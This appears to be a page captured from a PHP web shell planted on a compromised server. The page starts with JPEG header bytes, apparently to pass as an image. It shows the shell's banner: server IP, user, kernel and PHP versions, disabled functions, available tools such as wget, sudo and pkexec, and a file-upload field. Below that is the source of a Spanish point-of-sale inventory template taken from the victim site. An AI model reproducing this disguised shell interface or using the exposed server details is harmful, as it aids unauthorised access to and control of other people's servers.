����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����
Server IP : 74.208.127.88 / Your IP : 3.138.140.5 Web Server : Apache/2.4.41 (Ubuntu) System : Linux ubuntu 5.4.0-163-generic #180-Ubuntu SMP Tue Sep 5 13:21:23 UTC 2023 x86_64 User : www-data ( 33) PHP Version : 7.4.3-4ubuntu2.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /var/www/html/muebles/pos11/core/app/action/ |
Upload File : |
<div class="box-body table-responsive no-padding" style="max-width:1124px;"> <table id="table_search" class="table table-bordered table-hover "> <thead> <tr class="tableheader"> <th style="width:40px">#</th> <th style="width:260px">Nombre / Descripcion</th> <th style="width:120px">Unidad</th> <th style="width:160px">Precio Costo</th> <th style="width:90px">Existencia</th> <th style="width:160px"></th> <th></th> </tr> </thead> <tbody> <?php $Iden = ($_POST['ID']); if(isset($Iden)){ $product = ProductData::getBycode($Iden); if(count($product) == 1){ ?> <form method="post" action="index.php?view=addtore"> <?php $total = OperationData::GetQByStock($product->id,1); $total2 = OperationData2::GetQByStock($product->id,1); $ototal = -1*OperationData::GetOutputQYesF($product->id); ?> <tr class="<?php if($q<=$product->inventary_min){ echo "danger"; }?>"> <td style="width:80px;"><?php echo $product->barcode; ?></td> <td><?php echo $product->name; ?></td> <td><?php echo $product->unit; ?></td> <td><b> <input type="text" name="price_in" id="price_in" required value="<?php echo $product->price_in; ?>" class="form-control" placeholder="Efectivo"></b></td> <td> <?php echo ($total2); ?> </td> <td> <input type="hidden" name="product_id" value="<?php echo $product->id; ?>"> <input type="" class="form-control" required id="q" name="q" value="10" placeholder="Cantidad de producto ..."></td> <td style="width:100px;"> <button type="submit" class="btn btn-success"><i class="glyphicon glyphicon-refresh"></i> Agregar</button> </td> </tr> </form> <?php } else { echo "buscando..."; } } else { echo "<script>alert('Estas metiendo un valor no numérico');</script>"; } ?> </tbody> </table> </div>